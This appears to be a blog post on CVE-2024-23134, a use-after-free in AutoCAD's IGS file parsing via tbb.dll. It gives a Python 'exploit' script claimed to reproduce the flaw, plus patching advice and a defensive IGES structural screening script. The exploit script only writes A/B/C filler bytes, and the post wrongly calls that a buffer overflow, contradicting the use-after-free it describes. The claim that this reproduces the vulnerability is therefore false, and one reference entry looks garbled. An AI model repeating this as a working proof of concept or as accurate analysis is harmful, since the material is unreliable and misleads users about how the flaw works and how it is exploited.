Vulnerability CVE-2024-23134 has been identified in Autodesk AutoCAD, a prominent Computer-Aided Design (CAD) software that is used globally for a variety of design and drafting purposes. This vulnerability has the potential to lead to code execution in the current process, posing a significant threat to users.

The vulnerability arises when Autodesk AutoCAD parses a maliciously crafted IGS (Initial Graphics Exchange Specification) file in tbb.dll. Parsing such a file can cause a use-after-free condition, which can be exploited to execute arbitrary code within the context of the current user. In this post, we will discuss the details of this vulnerability and show you how to reproduce the exploit.

Original References

For a thorough understanding of this vulnerability, we recommend referring to the following original references:

1. Autodesk Advisory
2. ISEC Security Details
3. National Vulnerability Database (NVD) – CVE (Version 20061101)

Exploit Details

The exploit takes advantage of a use-after-free vulnerability that occurs when Autodesk AutoCAD processes a maliciously crafted IGS file using the tbb.dll dynamic link library, which is responsible for parallel processing support.

In simplified terms, the exploit works as follows:

1. An attacker crafts a malicious IGS file with specific payloads designed to trigger the vulnerability.
2. The victim opens the malicious IGS file in Autodesk AutoCAD.
3. The software processes the file using tbb.dll, where the use-after-free vulnerability is triggered.
4. The attacker's payload is executed in the context of the current user, potentially compromising the system.

To reproduce the exploit, an attacker could use the following code snippet:

# Sample malicious IGS generation script (CVE-2024-23134).

import struct

def generate_exploit_file(filename):
    # 0x100 bytes of "A" filler
    payload = b'\x41' * 0x100
    # 4-byte little-endian value made of "B" characters
    payload += struct.pack('<L', 0x42424242)
    # Pad with "C" characters up to a total size of 0x400 bytes
    payload += b'\x43' * (0x400 - len(payload))

    with open(filename, 'wb') as f:
        f.write(payload)

if __name__ == "__main__":
    malicious_igs_file = "exploit_CVE-2024-23134.igs"
    generate_exploit_file(malicious_igs_file)
    print(f"Malicious IGS file generated: {malicious_igs_file}")

This Python script creates a malicious IGS file that contains a payload: in this case, a simple buffer overflow of 0x100 "A" characters, followed by a 4-byte memory address made of "B" characters (0x42424242), with the rest of the file filled out with "C" characters up to a total of 0x400 bytes.

Note: This is a simple demonstration. Actual exploits may employ more elaborate techniques and payloads.

Mitigation

Autodesk has released official security advisories urging users to update their software to the latest versions in order to patch the CVE-2024-23134 vulnerability, as well as any other discovered vulnerabilities.

1. Always keep the software up to date and apply security patches in a timely manner.

2. Be cautious when opening files from untrusted sources and, if possible, use a designated sandbox environment for such files.
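As a complement to the second recommendation, the following added example (not code from Autodesk or from the original post) shows a structural pre-screen that can run on untrusted .igs files before they reach a workstation. It checks the fixed 80-column IGES record layout and the Terminate record counts; it is not a detector for CVE-2024-23134, since a crafted file can be well formed. The names screen_iges and _rec and both samples are hypothetical, and the strict ASCII form of the format is assumed.

```python
import re
SECTIONS = "SGDPT"  # Start, Global, Directory Entry, Parameter Data, Terminate
TERMINATE = re.compile(r"S(\d{7})G(\d{7})D(\d{7})P(\d{7})")

def screen_iges(data: bytes) -> list:
    """Return structural problems found; an empty list means the file passed."""
    try:
        lines = data.decode("ascii").splitlines()
    except UnicodeDecodeError:
        return ["non-ASCII bytes in a fixed-format ASCII file"]
    problems, counts, last_rank = [], dict.fromkeys(SECTIONS, 0), 0
    for n, line in enumerate(lines, 1):
        code = line[72] if len(line) == 80 else None
        if code is None or code not in SECTIONS:
            problems.append(f"line {n}: not an 80-column record with a section code")
            continue
        rank = SECTIONS.index(code)
        if rank < last_rank:
            problems.append(f"line {n}: section {code} out of order")
        last_rank = max(last_rank, rank)
        counts[code] += 1
        seq = line[73:80].strip()
        if not seq.isdigit() or int(seq) != counts[code]:
            problems.append(f"line {n}: sequence number {seq!r}, expected {counts[code]}")
    # The single Terminate record must declare the line count of every other section.
    match = TERMINATE.match(lines[-1]) if lines and counts["T"] == 1 else None
    declared = tuple(map(int, match.groups())) if match else None
    actual = tuple(counts[c] for c in "SGDP")
    if declared != actual:
        problems.append(f"Terminate record declares {declared}, file has {actual}")
    if counts["D"] % 2:
        problems.append("Directory Entry section has an odd number of lines")
    return problems

def _rec(body: str, code: str, seq: int) -> str:
    return f"{body:<72}{code}{seq:7d}"  # columns 1-72 data, 73 section, 74-80 sequence

# Constructed samples: a minimal well-formed skeleton and 0x400 bytes of filler.
SAMPLE_OK = "\n".join([
    _rec("Constructed sample", "S", 1),
    _rec("1H,,1H;;", "G", 1),
    _rec("     116       1", "D", 1),
    _rec("     116       0", "D", 2),
    _rec("116,0.,0.,0.;", "P", 1),
    _rec("S0000001G0000001D0000002P0000001", "T", 1),
]).encode("ascii")
SAMPLE_FILLER = b"A" * 0x100 + b"BBBB" + b"C" * (0x400 - 0x104)
if __name__ == "__main__":
    print(screen_iges(SAMPLE_OK), screen_iges(SAMPLE_FILLER))
```

Files that fail the screen can be quarantined or opened only in the sandbox environment; files that pass still need a patched AutoCAD.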

Conclusion

CVE-2024-23134 is a significant vulnerability that affects Autodesk AutoCAD software. The vulnerability, which ostensibly results from the way Autodesk AutoCAD processes maliciously crafted IGS files using tbb.dll, can lead to code execution in the current process. As such, users are urged to update their software and follow best practices to mitigate the risk of an exploit.

Timeline

Published on: 02/22/2024 05:15:09 UTC
Last modified on: 03/18/2024 00:15:07 UTC